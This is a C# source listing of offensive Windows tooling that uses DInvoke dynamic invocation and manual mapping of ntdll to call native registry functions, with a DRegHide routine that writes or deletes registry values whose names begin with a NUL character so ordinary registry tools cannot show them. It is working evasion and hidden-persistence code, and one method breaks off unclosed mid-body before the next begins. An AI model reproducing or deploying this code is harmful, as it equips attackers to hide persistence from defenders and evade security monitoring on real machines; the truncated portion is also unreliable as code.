/// <summary>
/// Invokes <c>ntdll!NtOpenKey</c> through DInvoke's dynamic invocation instead of a static
/// P/Invoke import.
/// </summary>
/// <param name="keyHandle">Receives the handle the native call wrote back into the argument array.</param>
/// <param name="desiredAccess">Access mask requested on the key.</param>
/// <param name="objectAttributes">Object attributes naming the key; passed in, not written back.</param>
/// <returns>The NTSTATUS returned by the native call.</returns>
public static DInvoke.Data.Native.NTSTATUS NtOpenKey(ref IntPtr keyHandle, STRUCTS.ACCESS_MASK desiredAccess, ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes)
{
    object[] nativeArgs = new object[] { keyHandle, desiredAccess, objectAttributes };
    object rawStatus = DInvoke.DynamicInvoke.Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtOpenKey", typeof(DELEGATES.NtOpenKey), ref nativeArgs);
    // The handle is an output parameter on the native side, so it is read back from slot 0.
    keyHandle = (IntPtr)nativeArgs[0];
    return (DInvoke.Data.Native.NTSTATUS)rawStatus;
}
/// <summary>
/// Variant of DRegHide that first calls DInvoke's MapModuleToMemory on ntdll.dll before
/// preparing the registry open. Only the set-up portion of the body is present in this listing.
/// </summary>
/// <param name="hive">"HKLM" or "HKCU"; rewritten in place to the native registry path.</param>
/// <param name="subKey">Key path below the hive.</param>
/// <param name="keyName">Value name; prefixed with a NUL character when <paramref name="hiddenKey"/> is set.</param>
/// <param name="keyValue">Value data (not read within the visible lines).</param>
/// <param name="hiddenKey">When true, the value name is given a leading U+0000.</param>
/// <param name="deleteKey">Not read within the visible lines.</param>
public static void DRegHideManualMap(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false)
{
    // The first assignment is dead: mappedDLL is immediately overwritten by the manual-map result.
    DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP();
    mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll");
    // NOTE(review): mappedDLL is never read in the visible lines; presumably it is consumed
    // in the truncated remainder — confirm before relying on it.
    try
    {
        // Translate the shorthand hive into the object-manager path NtOpenKey expects.
        if (hive == "HKLM")
        {
            hive = @"\Registry\Machine";
        }
        else if (hive == "HKCU")
        {
            String sid = WindowsIdentity.GetCurrent().User.ToString();
            hive = @"\Registry\User\" + sid;
        }
        else
        {
            throw new Exception("Hive needs to be either HKLM or HKCU");
        }
        // Hidden values: the name is given a leading NUL (U+0000).
        if (hiddenKey)
        {
            keyName = "\0" + keyName;
        }
        String regKey = hive + subKey;
        IntPtr keyHandle = IntPtr.Zero;
        STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES();
        DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING();
        // Unused: SID repeats the lookup above and is not read afterwards.
        string SID = WindowsIdentity.GetCurrent().User.ToString();
        DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey);
        // OBJECT_ATTRIBUTES.objectName must point at an unmanaged UNICODE_STRING; nothing in the
        // visible lines frees this allocation.
        IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey));
        // NOTE(review): fDeleteOld == true on freshly allocated memory asks the marshaller to
        // destroy a structure that was never there; false is the documented choice here.
        Marshal.StructureToPtr(UC_RegKey, oaObjectName, true);
        oa.Length = Marshal.SizeOf(oa);
        oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE;
        oa.objectName = oaObjectName;
        oa.SecurityDescriptor = IntPtr.Zero;
        oa.SecurityQualityOfService = IntPtr.Zero;
        DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS();
        // ref locals and access mask prepared for an NtOpenKey call; the call itself is not in the visible lines.
        ref IntPtr rkeyHandle = ref keyHandle;
        STRUCTS.ACCESS_MASK desiredAccess = STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS;
        ref STRUCTS.OBJECT_ATTRIBUTES roa = ref oa;
        // NOTE(review): the listing is truncated here — neither the try block nor the method body is closed in this view.
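/// <summary>
/// Opens a registry key through the native <c>NtOpenKey</c> wrapper and either writes a
/// <c>REG_SZ</c> value or deletes a value under it. Exceptions raised in the body are caught
/// and their message printed; results are reported on the console.
/// </summary>
/// <param name="hive">"HKLM" or "HKCU"; translated to the object-manager path
/// (<c>\Registry\Machine</c> or <c>\Registry\User\&lt;current user SID&gt;</c>).</param>
/// <param name="subKey">Key path below the hive; the default starts with a backslash.</param>
/// <param name="keyName">Name of the value to write or delete.</param>
/// <param name="keyValue">String data written when <paramref name="deleteKey"/> is false.</param>
/// <param name="hiddenKey">When true the value name is prefixed with a NUL character (U+0000)
/// before it is written; that leading NUL is the observable marker of such a value.</param>
/// <param name="deleteKey">When true the value is deleted instead of written.</param>
public static void DRegHide(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false)
{
    IntPtr keyHandle = IntPtr.Zero;
    IntPtr objectNamePtr = IntPtr.Zero;   // unmanaged UNICODE_STRING referenced by OBJECT_ATTRIBUTES
    IntPtr hiddenNamePtr = IntPtr.Zero;   // CoTaskMem buffer holding the NUL-prefixed value name
    try
    {
        String nativeHive = ResolveNativeHivePath(hive);
        String valueName = hiddenKey ? "\0" + keyName : keyName;
        // UNICODE_STRING.Length is a ushort byte count; refuse names the cast below would silently truncate.
        if (valueName.Length * 2 > ushort.MaxValue)
        {
            throw new ArgumentOutOfRangeException(nameof(keyName), "Value name is too long for a UNICODE_STRING");
        }

        DInvoke.Data.Native.UNICODE_STRING ucRegKey = new DInvoke.Data.Native.UNICODE_STRING();
        DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref ucRegKey, nativeHive + subKey);
        objectNamePtr = Marshal.AllocHGlobal(Marshal.SizeOf(ucRegKey));
        // fDeleteOld is false: the destination was just allocated and holds no previous structure.
        Marshal.StructureToPtr(ucRegKey, objectNamePtr, false);

        STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES();
        oa.Length = Marshal.SizeOf(oa);
        oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE;
        oa.objectName = objectNamePtr;
        oa.SecurityDescriptor = IntPtr.Zero;
        oa.SecurityQualityOfService = IntPtr.Zero;

        // NOTE(review): KEY_ALL_ACCESS is broader than set/delete needs; a narrower mask would
        // follow least privilege if STRUCTS.ACCESS_MASK defines one — confirm before changing.
        DInvoke.Data.Native.NTSTATUS status = TinyDinvoke.NtOpenKey(ref keyHandle, STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS, ref oa);
        if (status != DInvoke.Data.Native.NTSTATUS.Success)
        {
            // Every failure (missing key, access denied, ...) lands here; the status tells them apart.
            Console.WriteLine("Regkey not found: NtOpenKey returned " + status);
            return;
        }
        Console.WriteLine("Handle to " + nativeHive + " succesfully opened!");

        DInvoke.Data.Native.UNICODE_STRING ucValueName = new DInvoke.Data.Native.UNICODE_STRING();
        if (hiddenKey)
        {
            // The name starts with '\0', so the UNICODE_STRING is filled by hand from an explicit
            // byte count; presumably RtlInitUnicodeString would stop at that NUL — TODO confirm.
            hiddenNamePtr = Marshal.StringToCoTaskMemUni(valueName);
            ucValueName.Length = (ushort)(valueName.Length * 2);
            ucValueName.MaximumLength = (ushort)(valueName.Length * 2);
            ucValueName.Buffer = hiddenNamePtr;
        }
        else
        {
            DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref ucValueName, valueName);
        }

        if (deleteKey)
        {
            status = TinyDinvoke.NtDeleteValueKey(keyHandle, ref ucValueName);
            Console.WriteLine("key deletion status: " + status);
        }
        else
        {
            DInvoke.Data.Native.UNICODE_STRING ucValueData = new DInvoke.Data.Native.UNICODE_STRING();
            DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref ucValueData, keyValue);
            // NOTE(review): Length excludes the terminating NUL that REG_SZ data normally carries;
            // left as-is because the wrapper's size parameter type is not visible here.
            status = TinyDinvoke.NtSetValueKey(keyHandle, ref ucValueName, 0, STRUCTS.REGISTRY_TYPES.REG_SZ, ucValueData.Buffer, ucValueData.Length);
            if (status == DInvoke.Data.Native.NTSTATUS.Success)
            {
                Console.WriteLine("RegKey successfully set");
            }
            else
            {
                Console.WriteLine("RegKey not set: NtSetValueKey returned " + status);
            }
        }
    }
    catch (Exception e)
    {
        // Deliberately best-effort: callers get console output rather than an exception.
        Console.WriteLine(e.Message);
    }
    finally
    {
        // Release on every path — the open-failure and exception paths previously leaked all three.
        if (keyHandle != IntPtr.Zero)
        {
            TinyDinvoke.NtClose(keyHandle);
        }
        if (hiddenNamePtr != IntPtr.Zero)
        {
            Marshal.FreeCoTaskMem(hiddenNamePtr);
        }
        if (objectNamePtr != IntPtr.Zero)
        {
            Marshal.FreeHGlobal(objectNamePtr);
        }
    }
}

/// <summary>
/// Maps the "HKLM"/"HKCU" shorthand to the object-manager registry path that NtOpenKey expects.
/// </summary>
/// <param name="hive">Shorthand hive name.</param>
/// <returns><c>\Registry\Machine</c> or <c>\Registry\User\&lt;current user SID&gt;</c>.</returns>
/// <exception cref="ArgumentException">Thrown for any other shorthand.</exception>
private static String ResolveNativeHivePath(String hive)
{
    if (hive == "HKLM")
    {
        return @"\Registry\Machine";
    }
    if (hive == "HKCU")
    {
        return @"\Registry\User\" + WindowsIdentity.GetCurrent().User.ToString();
    }
    throw new ArgumentException("Hive needs to be either HKLM or HKCU", nameof(hive));
}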